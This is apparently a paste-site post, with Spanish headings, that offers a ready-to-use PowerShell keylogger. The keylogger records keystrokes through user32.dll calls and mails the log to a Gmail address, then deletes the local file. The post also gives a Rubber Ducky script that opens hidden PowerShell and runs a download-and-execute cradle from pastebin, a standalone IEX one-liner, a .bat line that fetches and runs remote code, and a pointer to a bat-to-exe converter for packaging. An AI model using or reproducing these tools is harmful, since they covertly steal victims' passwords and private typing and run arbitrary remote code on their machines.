· 6 years ago · Sep 28, 2019, 05:35 PM
1=============================================================================
2----------------------------------------------------------------------------
3
4
5SIMPLE KEYLOGGER ERRO404
6-----------------------------------------------------------------------------
7=============================================================================
8
9
10# Editar solo
11
12esta sección!
13$TimeToRun = 30
14$From = "user@gmail.com"
15$Pass = "xxxxxxx"
16$To =
17
18"User2@gmail.com"
19$Subject = "Keylogger Results"
20$body = "Keylogger Results"
21$SMTPServer =
22
23"smtp.gmail.com"
24$SMTPPort = "587"
25$credentials = new-object
26
27Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -
28
29Force)
30############################
31
32
33$TimeStart = Get-Date
34$TimeEnd = $timeStart.addminutes
35
36($TimeToRun)
37
38#requires -Version 2
39function Start-KeyLogger($Path="$env:temp\keylogger.txt")
40{
41
42
43# Signatures for API Calls
44 $signatures = @'
45[DllImport("user32.dll", CharSet=CharSet.Auto,
46
47ExactSpelling=true)]
48public static extern short GetAsyncKeyState(int virtualKeyCode);
49[DllImport("user32.dll", CharSet=CharSet.Auto)]
50public static extern int GetKeyboardState
51
52(byte[] keystate);
53[DllImport("user32.dll", CharSet=CharSet.Auto)]
54public static extern int
55
56MapVirtualKey(uint uCode, int uMapType);
57[DllImport("user32.dll", CharSet=CharSet.Auto)]
58public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate,
59
60System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
61'@
62
63 # load signatures and make
64
65members available
66 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace
67
68API -PassThru
69
70 # create output file
71 $null = New-Item -Path $Path -ItemType File -Force
72
73
74
75try
76 {
77
78 # create endless loop. When user presses CTRL+C, finally-block
79 # executes and
80
81shows the collected key presses
82 while ($TimeEnd -ge $TimeNow) {
83 Start-Sleep -
84
85Milliseconds 40
86
87 # scan all ASCII codes above 8
88 for ($ascii = 9; $ascii -le
89
90254; $ascii++) {
91 # get current key state
92 $state = $API::GetAsyncKeyState
93
94($ascii)
95
96 # is key pressed?
97 if ($state -eq -32767) {
98 $null =
99
100[console]::CapsLock
101
102 # translate scan code to real code
103 $virtualKey =
104
105$API::MapVirtualKey($ascii, 3)
106
107 # get keyboard state for virtual keys
108
109
110$kbstate = New-Object Byte[] 256
111 $checkkbstate = $API::GetKeyboardState($kbstate)
112
113
114
115 # prepare a StringBuilder to receive input key
116 $mychar = New-Object -
117
118TypeName System.Text.StringBuilder
119
120 # translate virtual key
121 $success =
122
123$API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
124
125 if
126
127($success)
128 {
129 # add key to logger file
130
131
132[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
133
134
135}
136 }
137 }
138 $TimeNow = Get-Date
139 }
140 }
141 finally
142 {
143 # open logger file in
144
145Notepad
146 send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path
147
148-smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
149 Remove-Item
150
151-Path $Path -force
152 exit 1
153 }
154}
155
156# records all key presses until script is aborted by
157
158pressing CTRL+C
159# will then open the file with collected key codes
160Start-KeyLogger
161
162
163---------------------------------------------------------------------------------------
164***************************************************************************************
165---------------------------------------------------------------------------------------
166
167 IEX
168
169(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/')
170
171-----------------------------------------------------------------------------------------
172***************************************************************************************
173-----------------------------------------------------------------------------------------
174
175
176DATOS DEL RUBBER DUCKY
177
178DELAY 1000
179GUI r
180DELAY 100
181STRING powershell -WindowStyle hidden
182ENTER
183DELAY 1000
184STRING IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/')
185ENTER
186
187
188--------------------------------------------------------------------------------------------
189
190-
191********************************************************************************************
192--------------------------------------------------------------------------------------------
193
194-
195
196
197PAGINA EN DONDE SE CARGA EL CODIGO
198
199https://pastebin.com
200
201PAGINA DESCARGA BAT TO EXE
202http://www.battoexeconverter.com/
203
204
205--------------------------------------------------------------------------------------------
206
207-
208*******************************************************************************************
209--------------------------------------------------------------------------------------------
210
211
212DATOS DEL BAT
213
214powershell -w h -c $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open
215
216('GET','https://pastebin.com/raw/',$false);$h.send();iex $h.responseText
217
218
219--------------------------------------------------------------------------------------------
220
221--
222********************************************************************************************
223
224**
225--------------------------------------------------------------------------------------------
226
227--